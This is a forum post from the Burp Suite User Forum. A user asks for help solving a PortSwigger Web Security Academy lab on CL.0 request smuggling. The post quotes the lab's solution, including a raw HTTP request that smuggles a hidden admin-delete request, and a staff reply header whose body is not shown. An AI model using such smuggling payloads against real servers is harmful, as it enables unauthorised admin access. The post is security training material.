The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Problems with passing Lab: CL.0 request smuggling

Entoni | Last updated: Nov 11, 2022 09:35PM UTC

Hello! Could you help to pass this lab - https://portswigger.net/web-security/request-smuggling/browser/cl-0/lab-cl-0-request-smuggling I have done steps following solutions, but can't reach final actions There are not video under text( Try so: Exploit In Burp Repeater, change the path of your smuggled prefix to point to /admin. Send the requests in sequence again and observe that the second request has successfully accessed the admin panel. Smuggle a request to GET /admin/delete?username=carlos request to solve the lab. POST /resources/images/blog.svg HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Cookie: session=YOUR-SESSION-COOKIE Connection: keep-alive Content-Length: CORRECT GET /admin/delete?username=carlos HTTP/1.1 Foo: x

Ben, PortSwigger Agent | Last updated: Nov 14, 2022 10:06AM UTC